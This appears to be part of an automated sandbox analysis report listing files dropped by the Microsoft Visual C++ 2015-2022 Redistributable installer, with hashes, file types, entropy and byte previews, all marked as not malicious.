                                                                        SSDEEP:48:c5DiTlOtKesi+hDtkQf7lz+W0gopN3m5+3cNONeN1ra8vWqPtlTKxKUTKlKXRoR+:uDiTlV5kQR9GLeE0ZxV6gIV
                                                                        MD5:3D1E15DEEACE801322E222969A574F17
                                                                        SHA1:58074C83775E1A884FED6679ACF9AC78ABB8A169
                                                                        SHA-256:2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
                                                                        SHA-512:10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">......</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [..] - .......... ..................Install ........../passive | /quiet - ..... UI ......... UI ... ........ UI ........../norestart - ..................... UI.../log log.txt - ............. %TEMP% ...

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\3082\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10825
                                                                        Entropy (8bit):5.1113252296046126
                                                                        Encrypted:false
                                                                        SSDEEP:192:HalhwTwQ4yzePBrarlvTteQH3bf9WaoXUBXZRaS9YARl0hcXNVD32:6lc4krlU2ymLN12
                                                                        MD5:873A413D23F830D3E87DAB3B94153E08
                                                                        SHA1:24CFC24F22CEF89818718A86F55F27606EB42668
                                                                        SHA-256:ABC11BB2B04DFF6AFE2D4D4F40D95A7D62E5AF352928AF90DAA3DADE58DD59BD
                                                                        SHA-512:DC1ECCB5CC4D3047401E2BC31F5EB3E21C7881C02744A2E63C10D3C911D1158DCFAC023988E873C33DC381C989304FE1D3CB27ED99D7801285C4C378553CD821
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 T\'c9RMINOS DE LICENCIA DEL SOFTWARE DE MICROSOFT\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Los t\'e9rminos de esta licencia son un contrato entre Microsoft Corporation (o, en funci\'f3n de donde viva, una de las sociedades del grupo) y usted. Se aplican al software mencionado anteriormente. Los t\'e9rminos tambi\'e9n se aplican a los servicios o actualizaciones de software de Microsoft, excepto en la medida en que sus t\'e9rminos sean diferentes.\par..\b SI USTED CUMPLE LOS PRESENTES T\'c9RMINOS DE ESTA LICENCIA, DISPONDR\'c1 DE LOS DERECHOS QUE A CONTINUACI\'d3N SE DESCRIBEN.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb1

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\3082\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3265
                                                                        Entropy (8bit):5.0491645049584655
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO/esS6VGhDv4tiUiyRUqzC4U+aD6N3m7xNh1NWNGbPz+9o3PWeKK9K9KfT:uDiTlxouUTiySqyIwz9sgxqvjIk8
                                                                        MD5:47F9F8D342C9C22D0C9636BC7362FA8F
                                                                        SHA1:3922D1589E284CE76AB39800E2B064F71123C1C5
                                                                        SHA-256:9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
                                                                        SHA-512:E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalaci.n de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.Est. seguro de que desea cancelar la operaci.n?</String>.. <String Id="HelpHeader">Ayuda de configuraci.n</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - instala, repara, desinstala o.. crea una copia local completa del paquete en el directorio. La opci.n predeterminada es la instalaci.n...../passive | /quiet - muestra una IU m.nima sin solicitudes o no muestra ninguna IU ni.. solicitud. De forma predeterminada, se muestran la IU y todas las solicitudes...../norestart - elimina cualquier intento

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\BootstrapperApplicationData.xml

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (633), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):15190
                                                                        Entropy (8bit):3.74084833991537
                                                                        Encrypted:false
                                                                        SSDEEP:192:X0svJBDnH5zHqQHG0Hd8Hz7HE06HA0rH3ptp2AtHxLUrMzLG0LxdtHJy5F0KI0Ba:X0sR9dLbmnoNLtR0AJtdt0IJVEpJEn
                                                                        MD5:F3ABECB590DEEF79A0892160C2951749
                                                                        SHA1:9481FA8A90EB63AED453487807B9325887345060
                                                                        SHA-256:045B724A294FB71687E9327E76094DDD13CD9A4D1064B13A411BE10302E05D0F
                                                                        SHA-512:74A401778D776A853DFE628B0EBAFFFFD4A8024F1C490A1F800176BF787A984CFD7416F8758CA49A36881572FD3296B7487C703076E274E1C7FB557446B99B44
                                                                        Malicious:false
                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.a.l.C.o.n.d.i.t.i.o.n. .C.o.n.d.i.t.i.o.n.=.".V.e.r.s.i.o.n.N.T. .&.g.t.;.=. .v.6...1.". .M.e.s.s.a.g.e.=.".[.W.i.x.B.u.n.d.l.e.N.a.m.e.]. .c.a.n. .o.n.l.y. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .W.i.n.d.o.w.s. .7. .a.n.d. .n.e.w.e.r. .p.l.a.t.f.o.r.m.s...". ./.>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.2.2. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.6.4.). .-. .1.4...3.4...3.1.9.3.1.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".y.e.s.". .I.d.=.".{.d.4.c.e.c.f.3.b.-.b.6.8.f.-.4.9.9.5.-.8.8.4.0.-.5.2.e.a.0.f.a.b.6.4.6.e.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.C.1.4.6.E.

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):9235
                                                                        Entropy (8bit):5.167332119309966
                                                                        Encrypted:false
                                                                        SSDEEP:192:H8kZ1UVDWkiWZTIsp/4hghFF1Qf4lCfnEtHixEGx736wHqItfSpOtJ32:cM1RWZMi/zzlOnjt5HLoa2
                                                                        MD5:04B33F0A9081C10E85D0E495A1294F83
                                                                        SHA1:1EFE2FB2D014A731B752672745F9FFECDD716412
                                                                        SHA-256:8099DC3CF9502C335DA829E5C755948A12E3E6DE490EB492A99DEB673D883D8B
                                                                        SHA-512:D1DBED00DF921169DD61501E2A3E95E6D7807348B188BE9DD8FC63423501E4D848ECE19AC466C3CACFCCC6084E0EB2F457DC957990F6F511DF10FD426E432685
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT SOFTWARE LICENSE TERMS\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software, except to the extent those have different terms.\par..\b IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE RIGHTS BELOW.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 INSTALLATION AND USE RIGHTS. \b0\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\f

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\logo.png

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):1861
                                                                        Entropy (8bit):6.868587546770907
                                                                        Encrypted:false
                                                                        SSDEEP:24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
                                                                        MD5:D6BD210F227442B3362493D046CEA233
                                                                        SHA1:FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
                                                                        SHA-256:335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
                                                                        SHA-512:464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR...@...@.............sRGB.........gAMA......a.....PLTE].q^.r_.r_.s`.s`.s`.ta.ta.ub.ub.vc.vd.vd.vd.we.we.xe.xg.yg yg zh zh"zi"{j#|i${j$|n*~n*.n,.o,.p..q0.r2.s3.t5.x;.x<.y>.z?.|B.~C.}E..F..F..H..I..J..L..O..P..W..Y..^..a..c..g..i..q..r..}.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................S......pHYs..%...%....^.....tEXtSoftware.Paint.NET v3.5.100.r.....IDATXG..iW.@...EJ.$M...`AEpG..7TpWT@\.."....(..(.._;...di:9.c>q..g....T...._...-....F..+..w.

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2952
                                                                        Entropy (8bit):5.052095286906672
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTl/+desK19hDUNKwsqq8+JIDxN3mt7NlN1NVvAdMcgLPDHVXK8KTKjKnSnYF:uDiTl/BbTxmup/vrxATd
                                                                        MD5:FBFCBC4DACC566A3C426F43CE10907B6
                                                                        SHA1:63C45F9A771161740E100FAF710F30EED017D723
                                                                        SHA-256:70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
                                                                        SHA-512:063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive | /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\thm.xml

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8332
                                                                        Entropy (8bit):5.184632608060528
                                                                        Encrypted:false
                                                                        SSDEEP:96:8L2HdQG+3VzHfz96zYFGaPSWXdhRAmImlqFQKFBiUxn7Ke5A82rkO/pWk3nswP:ZHAzZ/3
                                                                        MD5:F62729C6D2540015E072514226C121C7
                                                                        SHA1:C1E189D693F41AC2EAFCC363F7890FC0FEA6979C
                                                                        SHA-256:F13BAE0EC08C91B4A315BB2D86EE48FADE597E7A5440DCE6F751F98A3A4D6916
                                                                        SHA-512:CBBFBFA7E013A2B85B78D71D32FDF65323534816978E7544CA6CEA5286A0F6E8E7E5FFC4C538200211F11B94373D5658732D5D8AA1D01F9CCFDBF20F154F1471
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (c) .NET Foundation and contributors. All rights reserved. Licensed under the Microsoft Reciprocal License. See LICENSE.TXT file in the project root for full license information. -->......<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Heig

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\wixstdba.dll

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):195600
                                                                        Entropy (8bit):6.682530937585544
                                                                        Encrypted:false
                                                                        SSDEEP:3072:OXoiFK6b0k77I+QfaIl191rSJHvlalB+8BHkY6v53EfcUzN0m6I+WxBlnKzeZuqt:OXoQNb++gDrSJdr8BHkPh3wIgnK/IU1a
                                                                        MD5:EAB9CAF4277829ABDF6223EC1EFA0EDD
                                                                        SHA1:74862ECF349A9BEDD32699F2A7A4E00B4727543D
                                                                        SHA-256:A4EFBDB2CE55788FFE92A244CB775EFD475526EF5B61AD78DE2BCDFADDAC7041
                                                                        SHA-512:45B15ADE68E0A90EA7300AEB6DCA9BC9E347A63DBA5CE72A635957564D1BDF0B1584A5E34191916498850FC7B3B7ECFBCBFCB246B39DBF59D47F66BC825C6FD2
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..R...R...R..h.N..R..h.L.R..h.M..R.......R.......R.......R...*<..R...*,..R...R...S..K....R..K....R..N.@..R...R(..R..K....R..Rich.R..................PE..L......Z...........!................d.....................................................@..............................................................D......,.......T...............................@...............X............................text............................... ..`.rdata.............................@..@.data...............................@....gfids..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):650568
                                                                        Entropy (8bit):7.222670928617801
                                                                        Encrypted:false
                                                                        SSDEEP:12288:inMwHskY7gjcjhVIEhqgM7bWvcsi6aVKrIysU40vy3W/ceKSHMsiFyY6XN2:sMysZgjS1hqgSC/izGfHjymk4HM5yJ
                                                                        MD5:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        SHA1:8F4D4A1AFA9FD985C67642213B3E7CCF415591DA
                                                                        SHA-256:5A61F9775032457DB28EDD41F98F08C874E759F344EA8475C9AC8ABBBA68DE12
                                                                        SHA-512:FF8B87E7746ECF19A150874DEDD6EA4C51C76CFC291C5A80D9E5073A9BBBB2BD6ED7D10425B083578DC8D28D0D905E379FA3F919A60979E5B5C44EBC0AC613E6
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p.......?....@..............................................;..........0....(...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\cab2C04DDC374BD96EB5C8EB8208F2C7C92

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Microsoft Cabinet archive data, many, 5681793 bytes, 14 files, at 0x44 +A "mfc140.dll" +A "mfc140chs.dll", flags 0x4, number 1, extra bytes 20 in head, 372 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):5691993
                                                                        Entropy (8bit):7.997664401422205
                                                                        Encrypted:true
                                                                        SSDEEP:98304:cMnpn63ARJRnfmPh9YbStjHun8TDpd1LBEQxijqnHEWyK+bFZGujVyqXgpSMsYa1:7n6wZ4YbKHm8JTBLi+nkWSb2oVjXgpDq
                                                                        MD5:62BC0F466E65D9219281CF75C8F91380
                                                                        SHA1:0826A1591B81ACF0FE30D58E19B0A87DF2A49A3E
                                                                        SHA-256:534DD81BE6B7A23A745C36EDA87E6387C5D146C3A96C84793D0EDC7EB85B40F3
                                                                        SHA-512:17713F4228C0C2793C622BBB0A90BD5688D98A6576A695CB956FA233238C4C6E5B0CB43510BE4F072613AD575D0B44E7C847F48B785A161CC337A9E6FDCA3BB5
                                                                        Malicious:false
                                                                        Preview:MSCF......V.....D.............................V..'..............t...@.U.......EU.. .mfc140.dll.H...@.U...EU.. .mfc140chs.dll.P.....V...EU.. .mfc140cht.dll.P7...cW...EU.. .mfc140deu.dll.P...(.X...EU.. .mfc140enu.dll.P3..x.Y...EU.. .mfc140esn.dll.P7....Z...EU.. .mfc140fra.dll.P/....\...EU.. .mfc140ita.dll.P...hF]...EU.. .mfc140jpn.dll.P....+^...EU.. .mfc140kor.dll.P'...._...EU.. .mfc140rus.dll.PYV.X6`...EU.. .mfc140u.dll.Py........EU.. .mfcm140.dll.Py........EU.. .mfcm140u.dll.:G..7..CK.:kxSU.;m...M)....H.b.C[..EI \O..E........Z ...$.H8F..W....Q.BQ.....SP.Q.p91...lA.]k.sr.t.....r..k....O....,.1...@.......?.I.1.8|g"....;ty.F.,\..R......X..-]Z.<....d.e.R.s.L.....&$.Y.<>2T<se~.T.w.....9 ..d..y.......d.5z..^'|....&.......~.'Y;.y.u..|.'~.R.S......*\.r.m....?.fc^:~C^.`#-.1.#..t.~M..3..=.^.u./..0...q.?..2..|..,..\..I~D...#.n6..c.i9l..H.........l.] ..}:..W.,E:v8o.+..gv.>..u.+cX..P/.n....~.kA.....v..z-....c....jT&.OV..+..:.).XN.. .:....,...k.[...F..e..>1..E@.`..I...F.[.by!

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\cab5046A8AB272BF37297BB7928664C9503

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Microsoft Cabinet archive data, many, 926116 bytes, 11 files, at 0x44 +A "concrt140.dll" +A "msvcp140.dll", flags 0x4, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):936316
                                                                        Entropy (8bit):7.996550129280269
                                                                        Encrypted:true
                                                                        SSDEEP:24576:7Z6eSPpkI0D4ySp8ZMunuwOxu4qIDFAwkFu:WPOz4ySuFnu5x9hHkI
                                                                        MD5:45C9C674C0BA87F57168D6AB852E9641
                                                                        SHA1:73ACE24362F14DC58D4099DAE6E4E62902E9E950
                                                                        SHA-256:D14F231D1AB0D928E309B067622B5389E0DC6C4F0D3671632066F6586C442C76
                                                                        SHA-512:5BB06CA9C966C9EDD30944523A84EFD3C13B8EB9F6A5C6CFD961A0C82A1CB193E7B58BAF888DEDE7B740ED42CE76AB20C3E41A684C4DD9D818FF8B0D9E52E684
                                                                        Malicious:false
                                                                        Preview:MSCF.....!......D............................!...'..............H...P.........EU.. .concrt140.dll.P...P.....EU.. .msvcp140.dll.P.........EU.. .msvcp140_1.dll.P....c....EU.. .msvcp140_2.dll.P...@g....EU.. .msvcp140_atomic_wait.dll.P{...*....EU.. .msvcp140_codecvt_ids.dll.PS.......EU.. .vcamp140.dll.PG..0.....EU.. .vccorlib140.dll.P....@....EU.. .vcomp140.dll.P....-!...EU.. .vcruntime140.dll.P... ."...EU.. .vcruntime140_1.dll.]g.sQ3..CK.[yxT...IC.@w.@..H#A..yy.5....rB..e.e1....!..F..x....dd.}.....".I.,,....aQn.j@.B.z....}{..9.........U..:u..<W ......n. l...Mh...~....E....^.t.{{..:..=sJ......g.i..0..3.:u.5!u....&...c...A..S..~\..r.s.48...|<....;..g.........d..tt..D..3.8.q~|.......|......I.....*.{..=...]..N......s3..;x........|`(.q.o..gz.J..........S. |.@.P.7]..~..y....1THK...P!..f=."d53'Q.B..Ns.^/..6=..}r....+z..~.../{.D.DA........c..g............E!...\...@..t.b...../{Vv....mC....7y.L..6B[....A..!.p..W?..9.....V...~.x1R>.A/0.a....wF..................w.#.F.*q.Q

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\vcRuntimeAdditional_x64

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931., Template: x64;1033, Revision Number: {4031CBD1-E566-49F4-B008-5D35253621AE}, Create Time/Date: Thu Oct 6 00:09:24 2022, Last Saved Time/Date: Thu Oct 6 00:09:24 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.401455786069727
                                                                        Encrypted:false
                                                                        SSDEEP:3072:4viOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJd4a:4vipBaTDo1j//SZh4
                                                                        MD5:C214A9E931BBDD960BB48AC1A2B91945
                                                                        SHA1:A640C55DD522E01D0BE4307A5EEE9A40F779A6CC
                                                                        SHA-256:1DBD3E4E71C6678E640C289C1C64BBB12C70F65F52B27191680A9E4141D64B11
                                                                        SHA-512:D25FEF3BDD3CD18035892618602E27621E9FB3A913E7972EC7BB624D593AE4B766E718FD2E2C7342C589E9A97BEB03D2FEDEF22E824C6B539B83F199CB967933
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\vcRuntimeMinimum_x64

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931., Template: x64;1033, Revision Number: {F4326D14-4FF5-4F81-B678-481B19EBBB51}, Create Time/Date: Thu Oct 6 00:05:28 2022, Last Saved Time/Date: Thu Oct 6 00:05:28 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.395181381426635
                                                                        Encrypted:false
                                                                        SSDEEP:3072:lviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdPa:lvipBaTDo1j//SZhP
                                                                        MD5:DF77FC41AA2F85CA423919E397084137
                                                                        SHA1:5B87CD2DFB661DF49F9557E2FC3B95C7833C9B0B
                                                                        SHA-256:51B6A928F7BECBF525CBEFF180442B05533F8EA8F8494CC97A491E29BDD4B7C2
                                                                        SHA-512:A36B093011B9534DB0881EB72DE4638E39BE67A9844B14FCD3E40539AAFD9AA9CE7B14D3968AEDB092ECF9BCA9AC0918A65F65632643782EDAFEFA36FC12C3E2
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1028\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):18127
                                                                        Entropy (8bit):4.036737741619669
                                                                        Encrypted:false
                                                                        SSDEEP:192:xaz+aCQbjdBCLCgfvtfLEmmVxJzLKLIW7cBFCoSM0fvJ93eyryH1MqG1xcRY/c5f:seh/IMHexG4q2
                                                                        MD5:B7F65A3A169484D21FA075CCA79083ED
                                                                        SHA1:5DBFA18928529A798FF84C14FD333CB08B3377C0
                                                                        SHA-256:32585B93E69272B6D42DAC718E04D954769FE31AC9217C6431510E9EEAD78C49
